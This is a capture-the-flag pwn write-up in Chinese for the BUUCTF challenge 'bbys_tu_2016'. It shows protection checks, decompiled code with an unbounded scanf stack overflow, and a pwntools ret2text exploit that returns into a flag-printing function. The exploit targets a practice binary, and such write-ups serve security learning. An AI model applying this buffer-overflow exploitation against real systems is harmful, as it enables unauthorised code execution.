bbys tu 2016
# bbys tu 2016
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/bbys_tu_2016/bbys_tu_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [esp+14h] [ebp-Ch]
puts("This program is hungry. You should feed it.");
__isoc99_scanf("%s", &v4);
puts("Do you feel the flow?");
return 0;
}
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
printFlag函数如下:
int printFlag()
{
char s; // [esp+1Ah] [ebp-3Eh]
FILE *stream; // [esp+4Ch] [ebp-Ch]
stream = fopen("flag.txt", "r");
fgets(&s, 50, stream);
puts(&s);
fflush(stdout);
return fclose(stream);
}
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
静态链接
# 思路分析
目前信息:
main函数存在任意长度的溢出点printFlag函数可打印flag- No canary found
- NX enabled
- No PIE
思路:
- 32位
ret2text
- 32位
# exp
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/bbys_tu_2016/bbys_tu_2016'
# io = remote('node4.buuoj.cn', 26261)
io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x14+4
printFlag_addr=elf.symbols['printFlag']
main_addr=elf.symbols['main']
payload=flat(['a'*padding,printFlag_addr,main_addr])
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
2
3
4
5
6
7
8
9
10
11
12
13
上次更新: 2022/08/15, 00:29:49